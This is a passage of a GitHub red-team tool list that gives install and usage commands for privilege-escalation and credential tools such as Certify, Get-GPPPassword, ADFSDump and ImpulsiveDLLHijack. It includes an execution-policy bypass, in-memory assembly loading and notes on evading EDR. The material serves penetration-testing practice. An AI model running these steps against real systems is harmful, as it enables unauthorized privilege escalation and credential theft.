href="#tool-list">🔙</a><a href="https://github.com/diego-treitos/linux-smart-enumeration">linux-smart-enumeration</a></h3><a id="user-content-linux-smart-enumeration" class="anchor" aria-label="Permalink: 🔙linux-smart-enumeration" href="#linux-smart-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Linux smart enumeration is another good, less verbose, linux privesc tool for Linux.</p> <p dir="auto"><strong>Install + Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh"><pre>curl <span class="pl-s"><span class="pl-pds">"</span>https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh<span class="pl-pds">"</span></span> -Lo lse.sh<span class="pl-k">;</span>chmod 700 lse.sh</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png"><img src="https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Certify">Certify</a></h3><a id="user-content-certify" class="anchor" aria-label="Permalink: 🔙Certify" href="#certify"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).</p> <p dir="auto">Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.</p> <p dir="auto"><strong>Key features of Certify:</strong></p> <ul dir="auto"> <li>Certificate creation</li> <li>Certificate signing</li> <li>Certificate import</li> <li>Certificate trust modification</li> </ul> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Certify is compatible with <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>. Open the Certify project <a href="https://github.com/GhostPack/Certify">.sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Install: (Running Certify Through PowerShell)</strong></p> <p dir="auto">If you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt"><pre>[Convert]::ToBase64String([IO.File]::ReadAllBytes(<span class="pl-s"><span class="pl-pds">"</span>C:\Temp\Certify.exe<span class="pl-pds">"</span></span>)) <span class="pl-k">|</span> Out-File -Encoding ASCII C:<span class="pl-cce">\T</span>emp<span class="pl-cce">\C</span>ertify.txt</pre></div> <p dir="auto">Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))"><pre class="notranslate"><code>$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa...")) </code></pre></div> <p dir="auto">The Main() method and any arguments can then be invoked as follows:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="[Certify.Program]::Main("find /vulnerable".Split())"><pre class="notranslate"><code>[Certify.Program]::Main("find /vulnerable".Split()) </code></pre></div> <p dir="auto">Full compile instructions can be found <a href="https://github.com/GhostPack/Certify#compile-instructions">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# See if there are any vulnerable templates Certify.exe find /vulnerable # Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin"><pre><span class="pl-c"><span class="pl-c">#</span> See if there are any vulnerable templates</span> Certify.exe find /vulnerable <span class="pl-c"><span class="pl-c">#</span> Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal</span> Certify.exe request /ca:dc.theshire.local<span class="pl-cce">\t</span>heshire-DC-CA /template:VulnTemplate /altname:localadmin</pre></div> <p dir="auto">Full example walkthrough can be found <a href="https://github.com/GhostPack/Certify#example-walkthrough">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png"><img src="https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1">Get-GPPPassword</a></h3><a id="user-content-get-gpppassword" class="anchor" aria-label="Permalink: 🔙Get-GPPPassword" href="#get-gpppassword"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Get-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).</p> <p dir="auto">Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Follow the PowerSploit <a href="https://github.com/A-poc/RedTeam-Tools#powersploit">installation instructions</a> from this tool sheet.</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="powershell.exe -ep bypass Import-Module PowerSploit"><pre>powershell.exe -ep bypass Import-Module PowerSploit</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Get all passwords with additional information Get-GPPPassword # Get list of all passwords Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq"><pre><span class="pl-c"><span class="pl-c">#</span> Get all passwords with additional information</span> Get-GPPPassword <span class="pl-c"><span class="pl-c">#</span> Get list of all passwords</span> Get-GPPPassword <span class="pl-k">|</span> ForEach-Object {<span class="pl-smi">$_</span>.passwords} <span class="pl-k">|</span> Sort-Object -Uniq</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png"><img src="https://user-images.githubusercontent.com/100603074/210089230-6a61579b-849d-4175-96ec-6ea75e001038.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rasta-mouse/Sherlock">Sherlock</a></h3><a id="user-content-sherlock" class="anchor" aria-label="Permalink: 🔙Sherlock" href="#sherlock"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.</p> <p dir="auto"><em>Supports:</em></p> <ul dir="auto"> <li>MS10-015 : User Mode to Ring (KiTrap0D)</li> <li>MS10-092 : Task Scheduler</li> <li>MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow</li> <li>MS13-081 : TrackPopupMenuEx Win32k NULL Page</li> <li>MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference</li> <li>MS15-051 : ClientCopyImage Win32k</li> <li>MS15-078 : Font Driver Buffer Overflow</li> <li>MS16-016 : 'mrxdav.sys' WebDAV</li> <li>MS16-032 : Secondary Logon Handle</li> <li>MS16-034 : Windows Kernel-Mode Drivers EoP</li> <li>MS16-135 : Win32k Elevation of Privilege</li> <li>CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc</li> </ul> <p dir="auto"><strong>Install: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Git install git clone https://github.com/rasta-mouse/Sherlock # Load powershell module Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1"><pre><span class="pl-c"><span class="pl-c">#</span> Git install</span> git clone https://github.com/rasta-mouse/Sherlock <span class="pl-c"><span class="pl-c">#</span> Load powershell module</span> Import-Module -Name C:<span class="pl-cce">\I</span>NSTALL_LOCATION<span class="pl-cce">\S</span>herlock<span class="pl-cce">\S</span>herlock.ps1</pre></div> <p dir="auto"><strong>Usage: (PowerShell)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all functions Find-AllVulns # Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference) Find-MS14058"><pre><span class="pl-c"><span class="pl-c">#</span> Run all functions</span> Find-AllVulns <span class="pl-c"><span class="pl-c">#</span> Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)</span> Find-MS14058</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png"><img src="https://user-images.githubusercontent.com/100603074/210182250-b5e9a4c1-4d30-4591-b06b-7d58098c7fef.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/" rel="nofollow">https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/rasta-mouse/Watson">Watson</a></h3><a id="user-content-watson" class="anchor" aria-label="Permalink: 🔙Watson" href="#watson"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.</p> <p dir="auto">Great for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a>. Open the <a href="https://github.com/rasta-mouse/Watson">Watson project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all checks Watson.exe"><pre><span class="pl-c"><span class="pl-c">#</span> Run all checks</span> Watson.exe</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png"><img src="https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image text used from <a href="https://github.com/rasta-mouse/Watson#usage">https://github.com/rasta-mouse/Watson#usage</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/knight0x07/ImpulsiveDLLHijack">ImpulsiveDLLHijack</a></h3><a id="user-content-impulsivedllhijack" class="anchor" aria-label="Permalink: 🔙ImpulsiveDLLHijack" href="#impulsivedllhijack"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.</p> <p dir="auto">The discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.</p> <p dir="auto"><strong>Install:</strong></p> <ul dir="auto"> <li><strong>Procmon.exe</strong> -> <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/procmon" rel="nofollow">https://docs.microsoft.com/en-us/sysinternals/downloads/procmon</a></li> <li><strong>Custom Confirmatory DLL's</strong> : <ul dir="auto"> <li>These are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path</li> <li>Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)</li> <li>32Bit dll name should be: maldll32.dll</li> <li>64Bit dll name should be: maldll64.dll</li> <li>Install NuGet Package:** PeNet** -> <a href="https://www.nuget.org/packages/PeNet/" rel="nofollow">https://www.nuget.org/packages/PeNet/</a> (Prereq while compiling the ImpulsiveDLLHijack project)</li> </ul> </li> </ul> <p dir="auto"><strong>Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.</strong></p> <ul dir="auto"> <li> <p dir="auto"><strong>Build and Setup Information:</strong></p> <ul dir="auto"> <li> <p dir="auto"><strong>ImpulsiveDLLHijack</strong></p> <ul dir="auto"> <li>Clone the repository in Visual Studio</li> <li>Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> <a href="https://www.nuget.org/packages/PeNet/" rel="nofollow">https://www.nuget.org/packages/PeNet/</a></li> <li>Build the project!</li> <li>The ImpulsiveDLLHijack.exe will be inside the bin directory.</li> </ul> </li> <li> <p dir="auto"><strong>And for Confirmatory DLL's:</strong></p> <ul dir="auto"> <li>Clone the repository in Visual Studio</li> <li>Build the project with x86 and x64</li> <li>Rename x86 release as maldll32.dll and x64 release as maldll64.dll</li> </ul> </li> <li> <p dir="auto"><strong>Setup:</strong> Copy the Confirmatory DLL's (maldll32 & maldll64) in the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))</p> </li> </ul> </li> </ul> <p dir="auto"><em>Install instructions from <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites">https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites</a></em></p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Help ImpulsiveDLLHijack.exe -h # Look for vulnerabilities in an executable ImpulsiveDLLHijack.exe -path BINARY_PATH"><pre><span class="pl-c"><span class="pl-c">#</span> Help</span> ImpulsiveDLLHijack.exe -h <span class="pl-c"><span class="pl-c">#</span> Look for vulnerabilities in an executable </span> ImpulsiveDLLHijack.exe -path BINARY_PATH</pre></div> <p dir="auto">Usage examples can be found <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png"><img src="https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples">https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mandiant/ADFSDump">ADFSDump</a></h3><a id="user-content-adfsdump" class="anchor" aria-label="Permalink: 🔙ADFSDump" href="#adfsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A C# tool to dump all sorts of goodies from AD FS.</p> <p dir="auto">Created by Doug Bienstock <a href="https://twitter.com/doughsec" rel="nofollow">@doughsec</a> while at Mandiant FireEye.</p> <p dir="auto">This tool is designed to be run in conjunction with ADFSpoof. ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.</p> <p dir="auto"><strong>Requirements:</strong></p> <ul dir="auto"> <li>ADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.</li> <li>ADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.</li> <li>ADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.</li> </ul> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">ADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose "Release", and build.</p> <p dir="auto"><strong>Usage: (Flags)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# The Active Directory domain to target. Defaults to the current domain. /domain: # The Domain Controller to target. Defaults to the current DC. /server: # Switch. Toggle to disable outputting the DKM key. /nokey # (optional) SQL connection string if ADFS is using remote MS SQL rather than WID. /database"><pre><span class="pl-c"><span class="pl-c">#</span> The Active Directory domain to target. Defaults to the current domain.</span> /domain: <span class="pl-c"><span class="pl-c">#</span> The Domain Controller to target. Defaults to the current DC.</span> /server: <span class="pl-c"><span class="pl-c">#</span> Switch. Toggle to disable outputting the DKM key.</span> /nokey <span class="pl-c"><span class="pl-c">#</span> (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.</span> /database</pre></div> <p dir="auto"><a href="https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs" rel="nofollow">Blog - Exploring the Golden SAML Attack Against ADFS</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png"><img src="https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs" rel="nofollow">https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/AlessandroZ/BeRoot">BeRoot</a></h3><a id="user-content-beroot" class="anchor" aria-label="Permalink: 🔙BeRoot" href="#beroot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.</p> <p dir="auto">The goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment.</p> <p dir="auto">This project works on Windows, Linux and Mac OS.</p> <p dir="auto"><strong>Install: (Linux)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/AlessandroZ/BeRoot cd BeRoot/Linux/"><pre>git clone https://github.com/AlessandroZ/BeRoot <span class="pl-c1">cd</span> BeRoot/Linux/</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <p dir="auto">A pre-compiled version of BeRoot can be found <a href="https://github.com/AlessandroZ/BeRoot/releases">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run BeRoot python beroot.py # Run BeRoot with user password (If you know the password use it, you could get more results) python beroot.py --password super_strong_password"><pre><span class="pl-c"><span class="pl-c">#</span> Run BeRoot</span> python beroot.py <span class="pl-c"><span class="pl-c">#</span> Run BeRoot with user password (If you know the password use it, you could get more results)</span> python beroot.py --password super_strong_password</pre></div> <p dir="auto">Further information can be found here for:</p> <ul dir="auto"> <li><a href="https://github.com/AlessandroZ/BeRoot/tree/master/Linux">Linux</a></li> <li><a href="https://github.com/AlessandroZ/BeRoot/tree/master/Windows">Windows</a></li> </ul> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4"><img 